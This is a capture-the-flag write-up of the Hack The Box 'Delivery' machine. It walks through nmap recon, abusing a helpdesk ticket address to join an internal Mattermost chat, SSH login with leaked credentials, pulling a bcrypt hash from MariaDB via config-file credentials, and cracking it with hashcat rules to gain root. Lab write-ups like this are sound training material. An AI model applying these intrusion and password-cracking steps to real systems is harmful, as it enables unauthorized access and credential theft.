# Metadata

- IP: 10.129.143.202
- Date accessed: 5/9/2021

# Recon

What I know: 

Website is made with HTML5 Up


On the contact us page. looks like we might need this email extension to log in, we'll find a way 

```
Contact Us

For unregistered users, please use our HelpDesk to get in touch with our team. Once you have an @delivery.htb email address, you'll be able to have access to our MatterMost server.

```

On Help Desk delivery
```
http://helpdesk.delivery.htb/
```

Server not found



View Page source

Weird loop

```
			<pre><code>i = 0;

while (!deck.isInOrder()) {
    print 'Iteration ' + i;
    deck.shuffle();
    i++;
}

print 'It took ' + i + ' iterations to sort the deck.';</code></pre>

```

robots.txt 404 not found


# scanning

## Nmap

```
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
|   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp   open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
8065/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Cache-Control: no-cache, max-age=31556926, public
|     Content-Length: 3108
|     Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
|     Content-Type: text/html; charset=utf-8
|     Last-Modified: Sun, 09 May 2021 21:35:08 GMT
|     X-Frame-Options: SAMEORIGIN
|     X-Request-Id: 4r9csr6wmjfkuk7yhxtconr4ge
|     X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
|     Date: Sun, 09 May 2021 22:22:16 GMT


```
port 8065 is the one I'm interest in


Two links of interest, both does not work
```

    http://helpdesk.delivery.htb/
    http://delivery.htb:8065/

```

must be local, adding these links to `/etc/hosts/`

```
10.129.143.202	delivery.htb
10.129.143.202	helpdesk.delivery.htb

```

Can now access delivery.htb > same page as home page

- helpdesk.delivery.bth has OsTicket 
- helpdesk.delivery.bth:8065 has MatterMost

# Enumeration

Create a ticket to obtain the email we need


```
2018669@delivery.htb
```

Using this email to get in Matterost server. It's telling me to verify email

Mayeb I can check my ticket's status. Using the email I made ealier

```
Email: crit@test.test
Ticketnumber: 2018669
```

![ticketstat](ticket-status.png)

Go to the link to verify my email 

`http://delivery.htb:8065/login?extra=verified&email=2018669%40delivery.htb`

Login with my password, and saw this screen

![login](login.png)

Skip the Mattermost tutorial to get into the internal chat channel


![internal](internal.png)

Credentials to server are here!

`Credentials to the server are maildeliverer:Youve_G0t_Mail! `


```
System
9:25 AM

@root joined the team.
System
9:28 AM
@root updated the channel display name from: Town Square to: Internal
root
9:29 AM

@developers Please update theme to the OSTicket before we go live.  Credentials to the server are maildeliverer:Youve_G0t_Mail! 

Also please create a program to help us stop re-using the same passwords everywhere.... Especially those that are a variant of "PleaseSubscribe!"
root
10:58 AM

PleaseSubscribe! may not be in RockYou but if any hacker manages to get our hashes, they can use hashcat rules to easily crack all variations of common words or phrases.


```

# Exploit

Login via ssh using the crendentials I found 

```
~# ssh maildeliverer@10.129.143.202
The authenticity of host '10.129.143.202 (10.129.143.202)' can't be established.
ECDSA key fingerprint is SHA256:LKngIDlEjP2k8M7IAUkAoFgY/MbVVbMqvrFA6CUrHoM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.143.202' (ECDSA) to the list of known hosts.
maildeliverer@10.129.143.202's password: 
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan  5 06:09:50 2021 from 10.10.14.5
maildeliverer@Delivery:~$ 



```

cat user.txt to see flag!!! 

woohoo!!

# Priv Esc

Now that I'm in the system, it's time to look around 

in the dir /opt/mattermost/config/config.json has some info I can use
```
 "SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
        "DataSourceReplicas": [],
        "DataSourceSearchReplicas": [],
        "MaxIdleConns": 20,
        "ConnMaxLifetimeMilliseconds": 3600000,
        "MaxOpenConns": 300,
        "Trace": false,
        "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
        "QueryTimeout": 30,
        "DisableDatabaseSearch": false
    },

```
Looks like they're using AWS S3 for services as well 

Under datasource I can see the user `mmuser` with password `Crack_The_MM_Admin_PW` for SQL, so we can use that


```
maildeliverer@Delivery:/opt/mattermost/config$ mysql -u mmuser -D mattermost -p
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 88
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [mattermost]> 

```
They also use MariaDB too! 


Now I'm looking for root password

```
MariaDB [mattermost]> SELECT username, password FROM Users WHERE username = 'root';
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| root     | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
+----------+--------------------------------------------------------------+
1 row in set (0.001 sec)

```

### Decrype root password

It's hashed, and the message in the internal channel said that I can crack it hashcat, so that's what I'm gonna do 

`PleaseSubscribe! may not be in RockYou but if any hacker manages to get our hashes, they can use hashcat rules to easily crack all variations of common words or phrases.`

`PleaseSubscribe!` is a key 

What kind of hash is this? 

```

root@kali-virtualbox:~/GitLab/Offensive-Security/HackTheBox/Delivery# hashid -m -e '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO'

Analyzing '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO'
[+] Blowfish(OpenBSD) [Hashcat Mode: 3200]
[+] Woltlab Burning Board 4.x 
[+] bcrypt [Hashcat Mode: 3200]


```
use tag `-e` to see hashcat mode as well, we know it's `3200` now

Let's put it together to crack this hash


1) nano word.txt, put the key `PleaseSubscribe!` in
2) nano hash.txt and put the hash in
3) run `hashcat -r /usr/share/hashcat/rules/best64.rule --stdout word.txt`
4) now we got a whole  list of possible password
5) Copy all that in a file called `possoble_pw.txt`
5) run `hashcat -m 3200 hash.txt possible_pw.txt`
6) Results

````

hashcat (v6.0.0) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-AMD Ryzen 7 2700 Eight-Core Processor, 8925/8989 MB (4096 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 65 MB

Dictionary cache built:
* Filename..: possible_pw.txt
* Passwords.: 77
* Bytes.....: 1177
* Keyspace..: 77
* Runtime...: 0 secs

$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v...JwgjjO
Time.Started.....: Sun May  9 20:32:37 2021 (1 sec)
Time.Estimated...: Sun May  9 20:32:38 2021 (0 secs)
Guess.Base.......: File (possible_pw.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       62 H/s (8.01ms) @ Accel:4 Loops:32 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 32/77 (41.56%)
Rejected.........: 0/32 (0.00%)
Restore.Point....: 16/77 (20.78%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:992-1024
Candidates.#1....: PleaseSubscribe!02 -> PleaseSubscribs

Started: Sun May  9 20:32:36 2021
Stopped: Sun May  9 20:32:39 2021

````

the password is `PleaseSubscribe!21`

Login to the mail server again under root

```
maildeliverer@Delivery:/opt/mattermost/config$ su - root
Password: 
root@Delivery:~# ls
mail.sh  note.txt  py-smtp.py  root.txt
root@Delivery:~# cat root.txt 
e5d4--------------------------
root@Delivery:~# 


```

woo!
